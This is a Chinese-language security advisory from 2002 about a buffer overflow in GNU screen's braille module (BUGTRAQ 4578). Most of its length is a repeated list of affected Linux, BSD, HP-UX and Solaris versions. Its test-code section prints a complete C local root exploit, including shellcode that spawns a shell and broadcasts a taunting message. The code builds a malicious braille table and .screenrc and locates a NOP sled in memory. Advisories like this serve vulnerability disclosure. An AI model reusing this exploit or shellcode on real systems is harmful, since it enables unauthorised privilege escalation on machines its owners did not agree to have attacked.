|
|
GNU Screen Braille Module存在缓冲溢出漏洞
发布时间:2002-04-26
更新时间:2002-04-26
严重程度:高
威胁程度:本地管理员权限
错误类型:边界检查错误
利用方式:服务器模式
BUGTRAQ ID:4578
受影响系统GNU screen 3.9.4
- Caldera OpenLinux Server 3.1.1
- Caldera OpenLinux Workstation 3.1.1
- Conectiva Linux ecommerce
- Conectiva Linux graficas
- Conectiva Linux 5.0
- Conectiva Linux 5.1
- Conectiva Linux 6.0
- Conectiva Linux 7.0
- Debian Linux 2.2 68k
- Debian Linux 2.2 alpha
- Debian Linux 2.2 arm
- Debian Linux 2.2 IA-32
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 sparc
- FreeBSD FreeBSD 4.3
- FreeBSD FreeBSD 4.3 -RELEASE
- FreeBSD FreeBSD 4.3 -RELENG
- FreeBSD FreeBSD 4.3 -STABLE
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.4 -RELENG
- FreeBSD FreeBSD 4.4 -STABLE
- FreeBSD FreeBSD 4.5
- FreeBSD FreeBSD 4.5 -RELEASE
- FreeBSD FreeBSD 4.5 -STABLE
- HP HP-UX 10.20
- HP HP-UX 11.0
- HP HP-UX 11.11
- HP HP-UX 11.20
- MandrakeSoft Linux Mandrake 7.2
- MandrakeSoft Linux Mandrake 8.0
- MandrakeSoft Linux Mandrake 8.0 ppc
- MandrakeSoft Linux Mandrake 8.1
- MandrakeSoft Linux Mandrake 8.1 ia64
- MandrakeSoft Linux Mandrake 8.2
- NetBSD NetBSD 1.5
- NetBSD NetBSD 1.5.1
- NetBSD NetBSD 1.5.2
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 3.0
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 sparc
- RedHat Linux 7.0 alpha
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 sparc
- RedHat Linux 7.1 i386
- RedHat Linux 7.1 ia64
- RedHat Linux 7.2 alpha
- RedHat Linux 7.2 i386
- RedHat Linux 7.2 ia64
- S.u.S.E. Linux 6.4 alpha
- S.u.S.E. Linux 6.4 i386
- S.u.S.E. Linux 6.4 ppc
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 7.0 i386
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.1 alpha
- S.u.S.E. Linux 7.1 ppc
- S.u.S.E. Linux 7.1 sparc
- Slackware Linux 7.1
- Slackware Linux 8.0
- Sun Solaris 2.6
- Sun Solaris 2.6 _x86
- Sun Solaris 7.0
- Sun Solaris 7.0 _x86
- Sun Solaris 8.0
- Sun Solaris 8.0 _x86
GNU screen 3.9.8
- Caldera OpenLinux Server 3.1.1
- Caldera OpenLinux Workstation 3.1.1
- Conectiva Linux ecommerce
- Conectiva Linux graficas
- Conectiva Linux 5.0
- Conectiva Linux 5.1
- Conectiva Linux 6.0
- Conectiva Linux 7.0
- Debian Linux 2.2 68k
- Debian Linux 2.2 alpha
- Debian Linux 2.2 arm
- Debian Linux 2.2 IA-32
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 sparc
- FreeBSD FreeBSD 4.3
- FreeBSD FreeBSD 4.3 -RELEASE
- FreeBSD FreeBSD 4.3 -RELENG
- FreeBSD FreeBSD 4.3 -STABLE
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.4 -RELENG
- FreeBSD FreeBSD 4.4 -STABLE
- FreeBSD FreeBSD 4.5
- FreeBSD FreeBSD 4.5 -RELEASE
- FreeBSD FreeBSD 4.5 -STABLE
- HP HP-UX 10.20
- HP HP-UX 11.0
- HP HP-UX 11.11
- HP HP-UX 11.20
- MandrakeSoft Linux Mandrake 7.2
- MandrakeSoft Linux Mandrake 8.0
- MandrakeSoft Linux Mandrake 8.0 ppc
- MandrakeSoft Linux Mandrake 8.1
- MandrakeSoft Linux Mandrake 8.1 ia64
- MandrakeSoft Linux Mandrake 8.2
- NetBSD NetBSD 1.5
- NetBSD NetBSD 1.5.1
- NetBSD NetBSD 1.5.2
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 3.0
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 sparc
- RedHat Linux 7.0 alpha
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 sparc
- RedHat Linux 7.1 i386
- RedHat Linux 7.1 ia64
- RedHat Linux 7.2 alpha
- RedHat Linux 7.2 i386
- RedHat Linux 7.2 ia64
- S.u.S.E. Linux 6.4 alpha
- S.u.S.E. Linux 6.4 i386
- S.u.S.E. Linux 6.4 ppc
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 7.0 i386
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.1 alpha
- S.u.S.E. Linux 7.1 ppc
- S.u.S.E. Linux 7.1 sparc
- Slackware Linux 7.1
- Slackware Linux 8.0
- Sun Solaris 2.6
- Sun Solaris 2.6 _x86
- Sun Solaris 7.0
- Sun Solaris 7.0 _x86
- Sun Solaris 8.0
- Sun Solaris 8.0 _x86
GNU screen 3.9.9
- Caldera OpenLinux Server 3.1.1
- Caldera OpenLinux Workstation 3.1.1
- Conectiva Linux ecommerce
- Conectiva Linux graficas
- Conectiva Linux 5.0
- Conectiva Linux 5.1
- Conectiva Linux 6.0
- Conectiva Linux 7.0
- Debian Linux 2.2 68k
- Debian Linux 2.2 alpha
- Debian Linux 2.2 arm
- Debian Linux 2.2 IA-32
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 sparc
- FreeBSD FreeBSD 4.3
- FreeBSD FreeBSD 4.3 -RELEASE
- FreeBSD FreeBSD 4.3 -RELENG
- FreeBSD FreeBSD 4.3 -STABLE
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.4 -RELENG
- FreeBSD FreeBSD 4.4 -STABLE
- FreeBSD FreeBSD 4.5
- FreeBSD FreeBSD 4.5 -RELEASE
- FreeBSD FreeBSD 4.5 -STABLE
- HP HP-UX 10.20
- HP HP-UX 11.0
- HP HP-UX 11.11
- HP HP-UX 11.20
- MandrakeSoft Linux Mandrake 7.2
- MandrakeSoft Linux Mandrake 8.0
- MandrakeSoft Linux Mandrake 8.0 ppc
- MandrakeSoft Linux Mandrake 8.1
- MandrakeSoft Linux Mandrake 8.1 ia64
- MandrakeSoft Linux Mandrake 8.2
- NetBSD NetBSD 1.5
- NetBSD NetBSD 1.5.1
- NetBSD NetBSD 1.5.2
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 3.0
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 sparc
- RedHat Linux 7.0 alpha
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 sparc
- RedHat Linux 7.1 i386
- RedHat Linux 7.1 ia64
- RedHat Linux 7.2 alpha
- RedHat Linux 7.2 i386
- RedHat Linux 7.2 ia64
- S.u.S.E. Linux 6.4 alpha
- S.u.S.E. Linux 6.4 i386
- S.u.S.E. Linux 6.4 ppc
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 7.0 i386
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.1 alpha
- S.u.S.E. Linux 7.1 ppc
- S.u.S.E. Linux 7.1 sparc
- Slackware Linux 7.1
- Slackware Linux 8.0
- Sun Solaris 2.6
- Sun Solaris 2.6 _x86
- Sun Solaris 7.0
- Sun Solaris 7.0 _x86
- Sun Solaris 8.0
- Sun Solaris 8.0 _x86
GNU screen 3.9.10
- Caldera OpenLinux Server 3.1.1
- Caldera OpenLinux Workstation 3.1.1
- Conectiva Linux ecommerce
- Conectiva Linux graficas
- Conectiva Linux 5.0
- Conectiva Linux 5.1
- Conectiva Linux 6.0
- Conectiva Linux 7.0
- Debian Linux 2.2 68k
- Debian Linux 2.2 alpha
- Debian Linux 2.2 arm
- Debian Linux 2.2 IA-32
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 sparc
- FreeBSD FreeBSD 4.3
- FreeBSD FreeBSD 4.3 -RELEASE
- FreeBSD FreeBSD 4.3 -RELENG
- FreeBSD FreeBSD 4.3 -STABLE
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.4 -RELENG
- FreeBSD FreeBSD 4.4 -STABLE
- FreeBSD FreeBSD 4.5
- FreeBSD FreeBSD 4.5 -RELEASE
- FreeBSD FreeBSD 4.5 -STABLE
- HP HP-UX 10.20
- HP HP-UX 11.0
- HP HP-UX 11.11
- HP HP-UX 11.20
- MandrakeSoft Linux Mandrake 7.2
- MandrakeSoft Linux Mandrake 8.0
- MandrakeSoft Linux Mandrake 8.0 ppc
- MandrakeSoft Linux Mandrake 8.1
- MandrakeSoft Linux Mandrake 8.1 ia64
- MandrakeSoft Linux Mandrake 8.2
- NetBSD NetBSD 1.5
- NetBSD NetBSD 1.5.1
- NetBSD NetBSD 1.5.2
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 3.0
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 sparc
- RedHat Linux 7.0 alpha
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 sparc
- RedHat Linux 7.1 i386
- RedHat Linux 7.1 ia64
- RedHat Linux 7.2 alpha
- RedHat Linux 7.2 i386
- RedHat Linux 7.2 ia64
- S.u.S.E. Linux 6.4 alpha
- S.u.S.E. Linux 6.4 i386
- S.u.S.E. Linux 6.4 ppc
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 7.0 i386
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.1 alpha
- S.u.S.E. Linux 7.1 ppc
- S.u.S.E. Linux 7.1 sparc
- Slackware Linux 7.1
- Slackware Linux 8.0
- Sun Solaris 2.6
- Sun Solaris 2.6 _x86
- Sun Solaris 7.0
- Sun Solaris 7.0 _x86
- Sun Solaris 8.0
- Sun Solaris 8.0 _x86
GNU screen 3.9.11
- Caldera OpenLinux Server 3.1.1
- Caldera OpenLinux Workstation 3.1.1
- Conectiva Linux ecommerce
- Conectiva Linux graficas
- Conectiva Linux 5.0
- Conectiva Linux 5.1
- Conectiva Linux 6.0
- Conectiva Linux 7.0
- Debian Linux 2.2 68k
- Debian Linux 2.2 alpha
- Debian Linux 2.2 arm
- Debian Linux 2.2 IA-32
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 sparc
- FreeBSD FreeBSD 4.3
- FreeBSD FreeBSD 4.3 -RELEASE
- FreeBSD FreeBSD 4.3 -RELENG
- FreeBSD FreeBSD 4.3 -STABLE
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.4 -RELENG
- FreeBSD FreeBSD 4.4 -STABLE
- FreeBSD FreeBSD 4.5
- FreeBSD FreeBSD 4.5 -RELEASE
- FreeBSD FreeBSD 4.5 -STABLE
- HP HP-UX 10.20
- HP HP-UX 11.0
- HP HP-UX 11.11
- HP HP-UX 11.20
- MandrakeSoft Linux Mandrake 7.2
- MandrakeSoft Linux Mandrake 8.0
- MandrakeSoft Linux Mandrake 8.0 ppc
- MandrakeSoft Linux Mandrake 8.1
- MandrakeSoft Linux Mandrake 8.1 ia64
- MandrakeSoft Linux Mandrake 8.2
- NetBSD NetBSD 1.5
- NetBSD NetBSD 1.5.1
- NetBSD NetBSD 1.5.2
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 3.0
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 sparc
- RedHat Linux 7.0 alpha
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 sparc
- RedHat Linux 7.1 i386
- RedHat Linux 7.1 ia64
- RedHat Linux 7.2 alpha
- RedHat Linux 7.2 i386
- RedHat Linux 7.2 ia64
- S.u.S.E. Linux 6.4 alpha
- S.u.S.E. Linux 6.4 i386
- S.u.S.E. Linux 6.4 ppc
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 7.0 i386
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.1 alpha
- S.u.S.E. Linux 7.1 ppc
- S.u.S.E. Linux 7.1 sparc
- Slackware Linux 7.1
- Slackware Linux 8.0
- Sun Solaris 2.6
- Sun Solaris 2.6 _x86
- Sun Solaris 7.0
- Sun Solaris 7.0 _x86
- Sun Solaris 8.0
- Sun Solaris 8.0 _x86 详细描述
Screen是免费开放源代码的终端管理软件。使用在多种系统平台下。
在某些环境下,存在本地用户利用screen缓冲溢出提升权限,问题存在于screen中的braille module对边界检查不充分,本地用户提供超长字符串数据给screen程序,可导致缓冲溢出。
测试代码
/*
screen 3.9.11 local root exploit for braille module
dedicated to the $ecurity Community, where blind leading blind.
code for: linux/x86
to use:
1) edit paths in #defines
2) gcc -o GOBBLES-own-screen GOBBLES-own-screen.c
3) ./GOBBLES-own-screen -p
4) ./GOBBLES-own-screen -f
5) ./GOBBLES-own-screen -a 0xGOBBLES
if you want rootshell, that up to you to modify exploit.
beware vicious remote root exploit coming from GOBBLES for Sun Solaris
version 6-8, hurry up Sun to make patch. . .
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define NULLBASE 48
#define TABLE "/home/GOBBLES/hacking/.scrx"
#define SCREENRC "/home/GOBBLES/hacking/.screenrc"
#define SCREEN "/home/GOBBLES/hacking/current/screen-3.9.11/screen"
#define FIND 1
#define PUT 0
#define OFFSET -40300
#define SHELL "/bin/bash"
#define NOP 0x90
void bta(int byte, char *store);
void stuff(int que);
unsigned long get_sp(void)
{ __asm__ ("movl %esp, %eax");
// rumor is Cousin WOBBLES leaked this public, hehehe thnx!
}
int
main(int argc, char **argv)
{
char *a, *tmp, buf[64], store[10], c;
unsigned long address;
unsigned int w[4];
int i, b, start;
FILE *fd;
if(argc == 1) {
fprintf(stderr, "\n%s [ -p ] [ -f ] [ -a <shellcode address> -o <offset to GOT address> ]\n\n", argv[0]);
fprintf(stderr, "-p switch places shellcode into memory\n");
fprintf(stderr, "-f switch finds shellcode address\n\n");
fprintf(stderr, "No switch runs exploit with options:\n");
fprintf(stderr, "\t-a <shellcode address>\n");
fprintf(stderr, "\t-o <offset to GOT address>\n\n");
exit(0);
}
start = OFFSET;
while((c = getopt(argc, argv, "pfa:o:")) != EOF) {
switch(c) {
case 'p':
stuff(PUT);
exit(0);
case 'f':
stuff(FIND);
exit(0);
case 'a':
sscanf(optarg, "%p", &tmp);
address = (long)tmp;
break;
case 'o':
start = atoi(optarg);
break;
default:
fprintf(stderr, "hehehehe?\n");
exit(0);
}
}
fprintf(stderr, ". preparing evil braille table\n");
if((fd = fopen(TABLE, "w")) == NULL) {
perror("fopen");
exit(1);
}
fprintf(stderr, ". converting: 0x%lx into braille table strings\n", address);
w[0] = (address & 0x000000ff);
w[1] = (address & 0x0000ff00) >> 8;
w[2] = (address & 0x00ff0000) >> 16;
w[3] = (address & 0xff000000) >> 24;
for(i = 0; i < 4; i++) {
memset(store, 'o', 9);
bta(w[i], store);
memset(buf, '\0', sizeof(buf));
snprintf(buf, sizeof(buf), "%d ff %s\n", start+i, store);
fprintf(stderr, ". writing to braille table: %s", buf);
fprintf(fd, "%s", buf);
}
fclose(fd);
fprintf(stderr, ". preparing evil .screenrc\n");
if((fd = fopen(SCREENRC, "w")) == NULL) {
perror("fopen");
exit(1);
}
fprintf(fd, "bd_start_braille on\n");
memset(buf, '\0', sizeof(buf));
snprintf(buf, sizeof(buf), "bd_braille_table %s\n", TABLE);
fprintf(fd, "%s", buf);
fprintf(fd, "bd_type powerbraille_40\n");
fprintf(fd, "bd_port /dev/ttyS0\n");
fclose(fd);
fprintf(stderr, ". now exploiting blind, hehehe\n");
if(execl(SCREEN, "screen", "-c", SCREENRC, NULL)) {
fprintf(stderr, ". error executing\n");
exit(1);
}
}
void
bta(int byte, char *store)
{
int check[9], i, b, tmp;
check[0] = 0;
check[1] = 1;
check[2] = 2;
check[3] = 4;
check[4] = 8;
check[5] = 16;
check[6] = 32;
check[7] = 64;
check[8] = 128;
tmp = byte;
for(i = 8; i >= 0; i--) {
if(check[i] <= tmp) {
tmp -= check[i];
store[i] = 'x';
}
}
for(i = 0; i < 9; i++) {
if(store[i] == 'x')
store[i] = NULLBASE + i;
else
store[i] = NULLBASE;
}
store[9] = '\0';
fprintf(stderr, ". braille table string for byte: 0x%x is: %s\n", byte, store);
}
void
stuff(int que)
{
char *p, codebuf[4097], code[] =
// borrowed shellcode, GOBBLES lazy today,
// not sure who to credit for it, if it
// yours please email GOBBLES@hushmail.com
// to be acknowledged!
"\x31\xc0\x83\xc0\x17\x31\xdb\xcd\x80\xeb"
"\x30\x5f\x31\xc9\x88\x4f\x17\x88\x4f\x1a"
"\x8d\x5f\x10\x89\x1f\x8d\x47\x18\x89\x47"
"\x04\x8d\x47\x1b\x89\x47\x08\x31\xc0\x89"
"\x47\x0c\x8d\x0f\x8d\x57\x0c\x83\xc0\x0b"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8"
"\xcb\xff\xff\xff\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x2f\x62\x69\x6e\x2f\x73\x68\x30\x2d\x63"
"\x30"
// hehehe..hoping blind not deaf so he can hear beep, hehehe.
"echo \"Hope you not really blind, because you now owned by unethical penetrator using ethical GOBBLES exploit, hehehehe ;Pppppp\" | wall";
// also let user on shell provider know system comprimised, hehe.
char *locate = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
int i;
if(que == PUT) {
// adding many nops to build much suspense hehehe
memset(&codebuf, '\0', sizeof(codebuf));
memset(codebuf, NOP, (sizeof(codebuf) - 1));
memcpy(codebuf + (sizeof(codebuf) - strlen(code) - 1), code, strlen(code));
fprintf(stderr, ". run GOBBLES-own-screen -f\n");
if(setenv("CODE", codebuf, 1) == -1) {
fprintf(stderr, ". no mem for shellcode\n");
return;
}
system(SHELL);
}
else if(que == FIND) {
// track down nops
fprintf(stderr, ". getting address\n");
p = (char *)get_sp();
while((i = strncmp(p, locate, strlen(locate))) != 0)
p++;
if(i == 0) {
fprintf(stderr, ". shellcode found at: 0x%lx\n", p+1);
return;
}
else {
fprintf(stderr, ". trouble locating shellcode\n");
return;
}
}
}
解决方案
尚无
相关信息
参考:http://www.bugtraq.org/advisories/GOBBLES-33.txt
|
